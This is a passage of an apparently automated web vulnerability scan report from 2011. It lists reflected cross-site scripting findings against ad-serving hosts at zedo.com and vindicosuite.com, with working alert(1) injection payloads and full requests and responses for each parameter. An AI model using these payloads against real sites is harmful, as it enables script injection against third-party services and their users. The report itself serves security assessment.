FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:e66f0";alert(1)//c0290daf8fd;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',e66f0";alert(1)//c0290daf8fd';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,e66f0";alert(1)//c0290daf8fd;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                       
...[SNIP]...

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aacb'%3balert(1)//355b6461f7f was submitted in the l parameter. This input was echoed as 8aacb';alert(1)//355b6461f7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D8aacb'%3balert(1)//355b6461f7f&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 4217

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='';var zzC
...[SNIP]...
ADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=8aacb';alert(1)//355b6461f7f" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250>
...[SNIP]...

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b04'%3balert(1)//36d8d5a78d7 was submitted in the q parameter. This input was echoed as c0b04';alert(1)//36d8d5a78d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=c0b04'%3balert(1)//36d8d5a78d7&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:25 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='c0b04';alert(1)//36d8d5a78d7';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c0b04';alert(1)//36d8d5a78d7;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b86"%3balert(1)//7be31572be0 was submitted in the q parameter. This input was echoed as f9b86";alert(1)//7be31572be0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=f9b86"%3balert(1)//7be31572be0&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='f9b86";alert(1)//7be31572be0';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=f9b86";alert(1)//7be31572be0;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                       
...[SNIP]...

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the adRotationId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d7d"><script>alert(1)</script>1b977e7ff4d was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:35 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0260"><script>alert(1)</script>92954893223 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:30 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223" Class = "TrackingFrame">
...[SNIP]...

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff6ed"><script>alert(1)</script>f91a4c37806 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468ff6ed"><script>alert(1)</script>f91a4c37806&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3930


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55|49160|6468ff6ed"><script>alert(1)</script>f91a4c37806|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK">
...[SNIP]...

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262c2"><script>alert(1)</script>cd018174bf0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
